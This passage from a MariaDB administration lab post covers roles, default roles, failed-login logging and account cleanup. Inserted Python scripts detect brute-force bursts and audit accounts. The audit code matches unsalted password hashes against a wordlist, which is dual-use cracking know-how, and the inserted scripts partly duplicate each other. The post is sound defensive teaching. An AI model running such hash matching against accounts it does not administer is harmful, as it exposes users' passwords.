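    """Return a list of (account, finding) tuples for the non-role accounts."""
    findings = []
    owners_by_hash = defaultdict(list)
    cracked = {mysql_native_password(w): w for w in wordlist}

    for acct in accounts:
        if acct["is_role"] == "Y":
            continue  # roles never authenticate, so no password to audit
        name = f"{acct['user']}@{acct['host']}"
        if acct["host"] == "%":
            findings.append((name, "may connect from any host"))
        if "@" in acct["user"]:
            findings.append((name, "user name contains '@' (probably a quoting mistake)"))
        pw = acct["password"]
        if pw == "":
            # Empty hash: check the plugin and account_locked columns before worrying.
            findings.append((name, "no password hash; verify plugin/account_locked"))
        elif pw == "invalid":
            # Password authentication is disabled; the account relies on another
            # plugin (root and mysql use unix_socket on this server).
            continue
        else:
            owners_by_hash[pw].append(name)
            if pw in cracked:
                findings.append((name, f"password found in wordlist: {cracked[pw]}"))

    for names in owners_by_hash.values():
        if len(names) > 1:
            findings.append((", ".join(names), "share the same password"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_accounts(SAMPLE_ACCOUNTS, WORDLIST):
        print(f"{account:60} {finding}")
```

<p>In a real environment the rows would come from <i>SELECT user,host,password,plugin,account_locked,is_role FROM mysql.user</i> run by an account with read access to the <i>mysql</i> schema, and the wordlist would be whatever password policy you are checking against.</p>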
<p></p><p>Add users to the <i>securitynik_db_users </i>role ...</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> GRANT securitynik_db_users TO 'securitynik','nakia'@'localhost','neysa@localhost';</span>
<span style="color: white;">Query OK, 0 rows affected (0.010 sec)</span>
</pre></div>
<p></p><p>... and to the <i>securitynik_db_admins</i> role, then confirm what each role now grants:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> GRANT securitynik_db_admins TO 'admin';</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR 'securitynik_db_users';</span>
<span style="color: white;">+--------------------------------------------------------------+</span>
<span style="color: white;">| Grants for securitynik_db_users |</span>
<span style="color: white;">+--------------------------------------------------------------+</span>
<span style="color: white;">| GRANT USAGE ON *.* TO `securitynik_db_users` |</span>
<span style="color: white;">| GRANT SELECT ON `securitynik_db`.* TO `securitynik_db_users` |</span>
<span style="color: white;">+--------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS FOR 'securitynik_db_admins';</span>
<span style="color: white;">+-----------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for securitynik_db_admins |</span>
<span style="color: white;">+-----------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT USAGE ON *.* TO `securitynik_db_admins` |</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON `securitynik_db`.* TO `securitynik_db_admins` |</span>
<span style="color: white;">+-----------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span>
</pre></div>
<p></p><p>Set the default role for user <i>securitynik</i>. This step matters: a granted role is not active when a session starts, so without a default role the user would log in with nothing but <i>USAGE</i> and would have to run <i>SET ROLE securitynik_db_users</i> in every session. The same applies to <i>admin</i>, which has no default role yet.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SET DEFAULT ROLE securitynik_db_users FOR securitynik;</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
</pre></div>
<p></p><p>With that in place, time to get user <i>securitynik</i> to log in.</p><p>Before doing so, I made the following configuration change so that MariaDB writes its error log, which is where failed logins are recorded, to a known file. <i>log_error</i> is not a dynamic variable, so the server has to be restarted for the change to take effect.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo vi /etc/mysql/mariadb.cnf </span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo cat /etc/mysql/mariadb.cnf | grep --perl-regexp '\[mariadb\]' --after-context=1 </span>
<span style="color: white;">[mariadb]</span>
<span style="color: white;">log_error=/var/log/mysql/mariadb.err</span>
</pre></div>
<p></p><p>After the restart, the file <i>/var/log/mysql/mariadb.err</i> exists:</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo ls /var/log/mysql/mariadb.err </span>
<span style="color: white;">/var/log/mysql/mariadb.err</span>
</pre></div>
<p></p><p>Finally, try to log in a few times with a wrong password. Passing the password on the command line as done here is convenient in a lab, but it ends up in the shell history and is visible to other users in the process list; in real use, give <i>--password</i> with no value so the client prompts for it.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='Testing2' --verbose</span>
</pre></div>
</div><div><br /></div><div><div>Which resulted in the following entries in <i>mariadb.err</i>. Each line carries the timestamp, the connection id, the user and client host, and whether a password was supplied:</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">2022-10-25 16:26:47 31 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:50 32 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:52 33 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:52 34 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:53 35 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:54 36 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:54 37 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:56 38 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
<span style="color: white;">2022-10-25 16:29:57 39 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
</pre></div>
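<p>Entries like these are what a detection would key on. As an added example, not the post's own code, the following Python parses lines in that <i>mariadb.err</i> format and flags a user/host pair that accumulates five or more access-denied warnings inside a 60-second sliding window. The log sample is constructed inline: it repeats the nine lines above and adds two lines for an assumed remote <i>admin</i> client so there is a case that must not alert. The threshold and window are assumptions to tune for your environment.</p>

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the format of /var/log/mysql/mariadb.err shown above.
# The first nine lines are the ones from the post; the last two are assumed
# extra failures from a remote client and must stay below the threshold.
SAMPLE_LOG = """\
2022-10-25 16:26:47 31 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:50 32 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:52 33 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:52 34 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:53 35 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:54 36 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:54 37 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:56 38 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:57 39 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:31:10 40 [Warning] Access denied for user 'admin'@'192.0.2.10' (using password: NO)
2022-10-25 16:31:12 41 [Warning] Access denied for user 'admin'@'192.0.2.10' (using password: YES)
"""

ACCESS_DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<conn>\d+) \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)$"
)


def parse_access_denied(text):
    """Return (timestamp, user, host, password_supplied) for each matching line;
    lines that are not access-denied warnings are ignored."""
    events = []
    for line in text.splitlines():
        m = ACCESS_DENIED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["user"], m["host"], m["pw"] == "YES"))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Map (user, host) -> (first_ts, last_ts, count) for every pair that reaches
    `threshold` failures within any `window`; one alert per pair."""
    alerts = {}
    recent = defaultdict(deque)
    for ts, user, host, _ in sorted(events):
        key = (user, host)
        bucket = recent[key]
        bucket.append(ts)
        # Drop failures that fell out of the sliding window.
        while ts - bucket[0] > window:
            bucket.popleft()
        if len(bucket) >= threshold and key not in alerts:
            alerts[key] = (bucket[0], ts, len(bucket))
    return alerts


if __name__ == "__main__":
    alerts = detect_bruteforce(parse_access_denied(SAMPLE_LOG))
    for (user, host), (first, last, n) in alerts.items():
        print(f"ALERT {user}@{host}: {n} failures between {first} and {last}")
```

<p>The lone failure at 16:26:47 ages out of the window, so the alert for <i>securitynik@localhost</i> is raised on the run that starts at 16:29:50; the two remote <i>admin</i> failures never reach the threshold. On a live server the same logic would tail the file instead of reading a string.</p>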
<p></p><p>The above is expected as the password is incorrect. Trying again with the correct password.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='Testing1' --verbose</span>
<span style="color: white;">ERROR 4151 (HY000): Access denied, this account is locked</span>
</pre></div>
<p></p><p>This is also expected: the <i>ACCOUNT LOCK</i> at the end of the <i>CREATE USER</i> statement applied to every account created in it, <i>securitynik</i> included.</p><p>Let's now alter that account so it can authenticate.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> ALTER USER 'securitynik' ACCOUNT UNLOCK;</span>
<span style="color: white;">Query OK, 0 rows affected (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With the above change, we now have successful authentication.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='Testing1' --verbose</span>
<span style="color: white;">Welcome to the MariaDB monitor. Commands end with ; or \g.</span>
<span style="color: white;">Your MariaDB connection id is 43</span>
<span style="color: white;">Server version: 10.6.8-MariaDB-1 Debian buildd-unstable</span>
<span style="color: white;">Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.</span>
<span style="color: white;">Reading history-file /home/kali/.mysql_history</span>
<span style="color: white;">Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.</span>
<span style="color: white;">MariaDB [(none)]> </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
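<p>The <i>Access denied</i> warnings in the error log at the top of this section are what a defender should be alerting on: five failures against one account within four seconds. The Python below is an added example, not part of the original post; it parses that exact log format and flags accounts that reach a threshold of failures inside a time window (the threshold and window values are assumptions to tune for your own environment).</p>

```python
"""Flag bursts of failed logins in a MariaDB error log.

Added example, not from the original post. The log lines below are
constructed to match the [Warning] format shown earlier in this post; the
threshold and window values are assumptions to tune for your environment.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One "Access denied" warning line, e.g.
# 2022-10-25 16:29:53 35 [Warning] Access denied for user 'u'@'h' (using password: YES)
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<thread>\d+) \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)$"
)

# Constructed sample: five failures in four seconds for one account, one
# unrelated failure for another account, and a line that is not a warning.
SAMPLE_LOG = """\
2022-10-25 16:29:53 35 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:54 36 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:54 37 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:56 38 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:29:57 39 [Warning] Access denied for user 'securitynik'@'localhost' (using password: YES)
2022-10-25 16:31:10 40 [Warning] Access denied for user 'nakia'@'localhost' (using password: NO)
2022-10-25 16:31:11 41 [Note] Event Scheduler: Loaded 0 events
"""


def parse_access_denied(log_text):
    """Return (timestamp, user, host, used_password) for each matching line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # notes, errors and other warnings are ignored
        events.append((
            datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
            m.group("user"),
            m.group("host"),
            m.group("pw") == "YES",
        ))
    return events


def find_bursts(events, threshold=5, window_seconds=60):
    """Sliding window per 'user'@'host'.

    Returns {"user@host": (count, first_ts, last_ts)} for every account that
    reaches `threshold` failures within any `window_seconds` span.
    """
    by_account = defaultdict(list)
    for ts, user, host, _used_password in events:
        by_account[f"{user}@{host}"].append(ts)

    window = timedelta(seconds=window_seconds)
    findings = {}
    for account, stamps in by_account.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # shrink the window from the left until it spans <= window_seconds
            while stamps[end] - stamps[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                findings[account] = (count, stamps[start], stamps[end])
    return findings


if __name__ == "__main__":
    for acct, (n, first, last) in find_bursts(parse_access_denied(SAMPLE_LOG)).items():
        print(f"ALERT {acct}: {n} failed logins between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

Point the same parser at the server's real error log (the MariaDB error-log page in the references describes where it lives) and the single-failure case for <i>nakia</i> stays quiet while the burst is reported.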
<p></p><p>Confirm the <i>securitynik</i> default role.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [(none)]> SELECT CURRENT_ROLE();</span>
<span style="color: white;">--------------</span>
<span style="color: white;">SELECT CURRENT_ROLE()</span>
<span style="color: white;">--------------</span>
<span style="color: white;">+----------------------+</span>
<span style="color: white;">| CURRENT_ROLE()       |</span>
<span style="color: white;">+----------------------+</span>
<span style="color: white;">| securitynik_db_users |</span>
<span style="color: white;">+----------------------+</span>
<span style="color: white;">1 row in set (0.000 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With this in place let's set a new password for the securitynik user.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SET PASSWORD FOR 'securitynik' = PASSWORD('WelcomeWagon');</span>
<span style="color: white;">Query OK, 0 rows affected (0.009 sec)</span>
</pre></div>
</div><div><br /></div><div>Confirm the user can log in with the new password. First try the old password.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='Testing1' --verbose</span>
<span style="color: white;">ERROR 1045 (28000): Access denied for user 'securitynik'@'localhost' (using password: YES)</span>
</pre></div>
</div><div><br /></div><div>Failed as expected. Trying new password ...</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ mysql --user=securitynik --password='WelcomeWagon' --verbose</span>
<span style="color: white;">MariaDB [(none)]> </span>
</pre></div>
</div><div><br /></div><div>With this in place, let's tidy up. </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT user,host,password,default_role FROM mysql.user;</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+----------------------+</span>
<span style="color: white;">| User                  | Host      | Password                                  | default_role         |</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+----------------------+</span>
<span style="color: white;">| mariadb.sys           | localhost |                                           |                      |</span>
<span style="color: white;">| root                  | localhost | invalid                                   |                      |</span>
<span style="color: white;">| mysql                 | localhost | invalid                                   |                      |</span>
<span style="color: white;">| securitynik_db_users  |           |                                           |                      |</span>
<span style="color: white;">| securitynik_db_admins |           |                                           |                      |</span>
<span style="color: white;">| admin                 | %         | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 |                      |</span>
<span style="color: white;">| securitynik           | %         | *1D1F0D40B7E2B350296DAF7183062FBA4C8B81C9 | securitynik_db_users |</span>
<span style="color: white;">| nakia                 | localhost | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 |                      |</span>
<span style="color: white;">| neysa@localhost       | %         | *A7300B6D1322C0CFCE601E16B138D8139A4E07B7 |                      |</span>
<span style="color: white;">+-----------------------+-----------+-------------------------------------------+----------------------+</span>
<span style="color: white;">9 rows in set (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
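<p>Before cleaning up, the <i>mysql.user</i> listing above is worth auditing rather than just reading: three accounts share one password hash, several are reachable from any host, and one user is literally named <i>neysa@localhost</i>. The Python below is an added example, not from the original post; the rows are constructed from the output above and the checks are assumptions about what such a review should flag, not MariaDB behaviour.</p>

```python
"""Audit a mysql.user listing for the account-hygiene issues a cleanup should catch.

Added example, not from the original post. SAMPLE_ROWS is constructed from the
SELECT output shown above; the checks themselves are assumptions about what a
reviewer should flag, not MariaDB behaviour.
"""
from collections import defaultdict

# Query that produces the columns audit_users() expects (columns as shown in the post).
AUDIT_SQL = "SELECT user, host, password, is_role FROM mysql.user"

# Constructed from the post's mysql.user output: (User, Host, Password, is_role)
SAMPLE_ROWS = [
    ("mariadb.sys", "localhost", "", "N"),
    ("root", "localhost", "invalid", "N"),
    ("mysql", "localhost", "invalid", "N"),
    ("securitynik_db_users", "", "", "Y"),
    ("securitynik_db_admins", "", "", "Y"),
    ("admin", "%", "*A7300B6D1322C0CFCE601E16B138D8139A4E07B7", "N"),
    ("securitynik", "%", "*1D1F0D40B7E2B350296DAF7183062FBA4C8B81C9", "N"),
    ("nakia", "localhost", "*A7300B6D1322C0CFCE601E16B138D8139A4E07B7", "N"),
    ("neysa@localhost", "%", "*A7300B6D1322C0CFCE601E16B138D8139A4E07B7", "N"),
]

# Accounts created by MariaDB itself or its packaging; mariadb.sys is created
# locked with no password, root and mysql here use unix_socket ('invalid').
SYSTEM_ACCOUNTS = {"mariadb.sys", "root", "mysql"}


def audit_users(rows, system_accounts=SYSTEM_ACCOUNTS):
    """Return {category: [finding, ...]} for the rows of mysql.user."""
    findings = defaultdict(list)
    by_hash = defaultdict(list)
    for user, host, password, is_role in rows:
        if is_role == "Y":
            continue  # roles have no host and cannot authenticate
        acct = f"'{user}'@'{host}'"
        if host == "%":
            findings["wildcard_host"].append(acct)
        if "@" in user:
            # e.g. 'neysa@localhost'@'%': the whole user@host string most likely
            # became the username, so the host fell back to '%' instead of localhost
            findings["host_in_username"].append(acct)
        if password == "" and user not in system_accounts:
            findings["empty_password"].append(acct)
        if password.startswith("*"):  # mysql_native_password hash
            by_hash[password].append(acct)
    for digest, accts in by_hash.items():
        if len(accts) > 1:
            # identical hashes mean identical passwords (this scheme is unsalted)
            findings["shared_password_hash"].append((digest[:9] + "...", sorted(accts)))
    return dict(findings)


if __name__ == "__main__":
    for category, items in audit_users(SAMPLE_ROWS).items():
        print(f"{category}:")
        for item in items:
            print(f"  {item}")
```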
</div><p>Remove user <i>securitynik</i> from the default role <i>securitynik_db_users</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SET DEFAULT ROLE NONE FOR securitynik;</span>
<span style="color: white;">Query OK, 0 rows affected (0.001 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SELECT user,host,password,default_role FROM mysql.user WHERE user='securitynik';</span>
<span style="color: white;">+-------------+------+-------------------------------------------+--------------+</span>
<span style="color: white;">| User        | Host | Password                                  | default_role |</span>
<span style="color: white;">+-------------+------+-------------------------------------------+--------------+</span>
<span style="color: white;">| securitynik | %    | *1D1F0D40B7E2B350296DAF7183062FBA4C8B81C9 |              |</span>
<span style="color: white;">+-------------+------+-------------------------------------------+--------------+</span>
<span style="color: white;">1 row in set (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>With the default role removed from <i>securitynik</i>, the roles themselves can be dropped. First verify the roles still exist; dropping <i>securitynik_db_users</i> and <i>securitynik_db_admins</i> also removes any permissions previously granted through them.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT user,is_role FROM mysql.user WHERE user='securitynik_db_users' or user='securitynik_db_admins';</span>
<span style="color: white;">+-----------------------+---------+</span>
<span style="color: white;">| User                  | is_role |</span>
<span style="color: white;">+-----------------------+---------+</span>
<span style="color: white;">| securitynik_db_users  | Y       |</span>
<span style="color: white;">| securitynik_db_admins | Y       |</span>
<span style="color: white;">+-----------------------+---------+</span>
<span style="color: white;">2 rows in set (0.001 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Drop the roles and verify they no longer exist.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DROP ROLE securitynik_db_users,securitynik_db_admins;</span>
<span style="color: white;">Query OK, 0 rows affected (0.011 sec)</span>
<span style="color: white;">MariaDB [securitynik_db]> SELECT user,is_role FROM mysql.user WHERE user='securitynik_db_users' or user='securitynik_db_admins';</span>
<span style="color: white;">Empty set (0.001 sec)</span>
</pre></div>
</div><div><br /></div><div>This also removed the grants assigned to those roles, as expected.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SHOW GRANTS;</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| Grants for root@localhost                                                                                                               |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">| GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` IDENTIFIED VIA mysql_native_password USING 'invalid' OR unix_socket WITH GRANT OPTION |</span>
<span style="color: white;">| GRANT PROXY ON ''@'%' TO 'root'@'localhost' WITH GRANT OPTION                                                                           |</span>
<span style="color: white;">+-----------------------------------------------------------------------------------------------------------------------------------------+</span>
<span style="color: white;">2 rows in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div><div>Review the data in the <i>interesting_data </i>table</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT * FROM interesting_data;</span>
<span style="color: white;">+---------+-----------------------------+--------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">| file_no | owner                       | password           | admin | comments              | blogs                       | delete_me             |</span>
<span style="color: white;">+---------+-----------------------------+--------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">|       1 | securitynik                 | Testing1           | Y     | Systems Administrator | https://www.securitynik.com | you are to be deleted |</span>
<span style="color: white;">|       2 | booo                        | Testing1           | Y     | Guest User            | https://www.example.local   | NULL                  |</span>
<span style="color: white;">|       3 | owner_updated_YouKnowWhoIAm | You changed me :-( | Y     | some user             | https://www.blah.local      | NULL                  |</span>
<span style="color: white;">|       4 | hello                       | world              | Y     | hi                    | securitynik.local           | NULL                  |</span>
<span style="color: white;">+---------+-----------------------------+--------------------+-------+-----------------------+-----------------------------+-----------------------+</span>
<span style="color: white;">4 rows in set (0.000 sec)</span>
</pre></div>
</div><div><br /></div><div>Delete a few rows from the <i>interesting_data</i> table.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> DELETE FROM interesting_data WHERE file_no=1 or file_no=2 or file_no=3;</span>
<span style="color: white;">Query OK, 3 rows affected (0.010 sec)</span>
</pre></div>
</div><div><br /></div><div>Verify the records no longer exist.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">MariaDB [securitynik_db]> SELECT * FROM interesting_data;</span>
<span style="color: white;">+---------+-------+----------+-------+----------+-------------------+-----------+</span>
<span style="color: white;">| file_no | owner | password | admin | comments | blogs             | delete_me |</span>
<span style="color: white;">+---------+-------+----------+-------+----------+-------------------+-----------+</span>
<span style="color: white;">|       4 | hello | world    | Y     | hi       | securitynik.local | NULL      |</span>
<span style="color: white;">+---------+-------+----------+-------+----------+-------------------+-----------+</span>
<span style="color: white;">1 row in set (0.002 sec)</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
